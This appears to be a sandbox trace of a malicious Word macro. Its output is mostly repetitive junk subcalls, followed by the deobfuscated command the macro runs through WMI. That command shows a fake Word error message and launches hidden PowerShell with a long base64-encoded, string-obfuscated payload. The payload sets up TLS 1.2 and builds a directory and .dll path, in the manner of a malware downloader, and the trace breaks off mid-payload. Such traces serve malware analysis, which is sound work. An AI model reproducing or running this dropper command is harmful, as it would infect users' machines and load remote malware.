Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
oUWfJGBeE
Close
EJEApM
YzIkA
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
CCnbXRBeA
Close
oMcHDXEF
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
SOunIGkF
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
XsKjcKE
Close
eWkHqVao
CreateObject	CreateObject("winmgmts:win32_process")
VfJHAA
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
zOBhOx
Close
XjhOHEMDC
Mid
Len	Len("\x01 ]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 JA]anw[3A5]anw[3AD]anw[3UA]anw[3WA]anw[3BV]anw[3AG]anw[3MA]anw[3RA]anw[3Ag]anw[3AC]anw[3AA]anw[3PQ]anw[3Ag]anw[3AC]anw[3AA]anw[3Ww]anw[3BU]anw[3AF]anw[3kA]anw[3cA]anw[3BF]anw[3AF]anw[30A]anw[3KA]anw[3Ai]anw[3AH]anw[3sA]anw[3MA]anw[3B9]anw[3AH]anw[3sA]anw[3Mg]anw[3B9]anw[3AH]anw[3sA]anw[3NA]anw[3B9]anw[3AH]anw[3sA]anw[3Mw]anw[3B9]anw[3AH]anw[3sA]anw[3MQ]anw[3B9]anw[3AC]anw[3IA]anw[3IA]anw[3At]anw[3AG]anw[3YA]anw[3Jw]anw[3BT]anw[3AF]anw[3kA]anw[3Uw]anw[3BU]anw[3AG]anw[3UA]anw[3Jw]anw[3As]anw[3AC]anw[3cA]anw[3Qw]anw[3BU]anw[3AE]anw[38A]anw[3Ug]anw[3B5]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AE]anw[30A]anw[3Jw]anw[3As]anw[3AC]anw[3cA]anw[3Ug]anw[3BF]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AC]anw[34A]anw[3aQ]anw[3Bv]anw[3AC]anw[34A]anw[3ZA]anw[3BJ]anw[3AC]anw[3cA]anw[3KQ]anw[3Ag]anw[3AC]anw[3AA]anw[3Ow]anw[3Ag]anw[3AC]anw[3AA]anw[3cw]anw[3BF]anw[3AF]anw[3QA]anw[3LQ]anw[3BJ]anw[3AH]anw[3QA]anw[3RQ]anw[3Bt]anw[3AC]anw[3AA]anw[3IA]anw[3Ao]anw[3AC]anw[3cA]anw[3Vg]anw[3An]anw[3AC]anw[3sA]anw[3Jw]anw[3Bh]anw[3AH]anw[3IA]anw[3aQ]anw[3BB]anw[3AE]anw[3IA]anw[3TA]anw[3Bl]anw[3AC]anw[3cA]anw[3Kw]anw[3An]anw[3AD]anw[3oA]anw[3Rg]anw[3BJ]anw[3AF]anw[3UA]anw[3Jw]anw[3Ap]anw[3AC]anw[3AA]anw[3IA]anw[3Ao]anw[3AC]anw[3AA]anw[3IA]anw[3Bb]anw[3AH]anw[3QA]anw[3eQ]anw[3Bw]anw[3AE]anw[3UA]anw[3XQ]anw[3Ao]anw[3AC]anw[3IA]anw[3ew]anw[3Ax]anw[3AH]anw[30A]anw[3ew]anw[3A0]anw[3AH]anw[30A]anw[3ew]anw[3Aw]anw[3AH]anw[30A]anw[3ew]anw[3A2]anw[3AH]anw[30A]anw[3ew]anw[3A1]anw[3AH]anw[30A]anw[3ew]anw[3Az]anw[3AH]anw[30A]anw[3ew]anw[3Ay]anw[3AH]anw[30A]anw[3Ig]anw[3Ag]anw[3AC]anw[30A]anw[3Zg]anw[3An]anw[3AE]anw[30A]anw[3Lg]anw[3Bu]anw[3AE]anw[3UA]anw[3VA]anw[3Au]anw[3AF]anw[3MA]anw[3ZQ]anw[3BS]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AH]anw[3MA]anw[3WQ]anw[3Bz]anw[3AH]anw[3QA]anw[3Jw]anw[3As]anw[3AC]anw[3cA]anw[3VA]anw[3BN]anw[3AG]anw[3EA]anw[3Tg]anw[3BB]anw[3AE]anw[3cA]anw[3ZQ]anw[3By]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AE]anw[34A]anw[3Jw]anw[3As]anw[3AC]anw[3cA]anw[3RQ]anw[3An]anw[3AC]anw[3wA]anw[3Jw]anw[3BJ]anw[3AC]anw[3cA]anw[3LA]anw[3An]anw[3AH]anw[3YA]anw[3SQ]anw[3Bj]anw[3AE]anw[3UA]anw[3UA]anw[3Bv]anw[3AC]anw[3cA]anw[3KQ]anw[3Ap]anw[3AD]anw[3sA]anw[3JA]anw[3BF]anw[3AH]anw[3IA]anw[3cg]anw[3Bv]anw[3AH]anw[3IA]anw[3QQ]anw[3Bj]anw[3AH]anw[3QA]anw[3aQ]anw[3Bv]anw[3AG]anw[34A]anw[3UA]anw[3By]anw[3AG]anw[3UA]anw[3Zg]anw[3Bl]anw[3AH]anw[3IA]anw[3ZQ]anw[3Bu]anw[3AG]anw[3MA]anw[3ZQ]anw[3Ag]anw[3AD]anw[30A]anw[3IA]anw[3Ao]anw[3AC]anw[3cA]anw[3Uw]anw[3Bp]anw[3AC]anw[3cA]anw[3Kw]anw[3Ao]anw[3AC]anw[3cA]anw[3bA]anw[3Bl]anw[3AC]anw[3cA]anw[3Kw]anw[3An]anw[3AG]anw[34A]anw[3Jw]anw[3Ap]anw[3AC]anw[3sA]anw[3KA]anw[3An]anw[3AH]anw[3QA]anw[3Jw]anw[3Ar]anw[3AC]anw[3cA]anw[3bA]anw[3B5]anw[3AE]anw[3MA]anw[3Jw]anw[3Ap]anw[3AC]anw[3sA]anw[3KA]anw[3An]anw[3AG]anw[38A]anw[3Jw]anw[3Ar]anw[3AC]anw[3cA]anw[3bg]anw[3B0]anw[3AC]anw[3cA]anw[3KQ]anw[3Ar]anw[3AC]anw[3gA]anw[3Jw]anw[3Bp]anw[3AC]anw[3cA]anw[3Kw]anw[3An]anw[3AG]anw[34A]anw[3dQ]anw[3Bl]anw[3AC]anw[3cA]anw[3KQ]anw[3Ap]anw[3AD]anw[3sA]anw[3JA]anw[3BI]anw[3AG]anw[3MA]anw[3Ng]anw[3Bj]anw[3AD]anw[3YA]anw[3dQ]anw[3B5]anw[3AD]anw[30A]anw[3JA]anw[3BJ]anw[3AD]anw[3cA]anw[3N) -> 21593
waSbS
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
QrVtQr
Close
MfgnKGWI
yUWxTlVAC
CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: rtGyqOth
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wUoJIFDD
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: XKPUEfhk
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: xOnWA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: kboRA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: wCjuwBBGN
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: HOkLRDGd
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: eBddHTXP
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: TFXNGIiH
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: lgZgGO
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateObject
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: CreateTextFile
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: WriteLine
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: UMzHfyAfA
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: Close
Part of subcall function Bp63ahh3hb4hyq@Oi5oelv0_s4: zgBjJOGEH
CreateTextFile
WriteLine
WriteLine
WriteLine
IYKcgC
Close
ThHBBDu
Create	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHc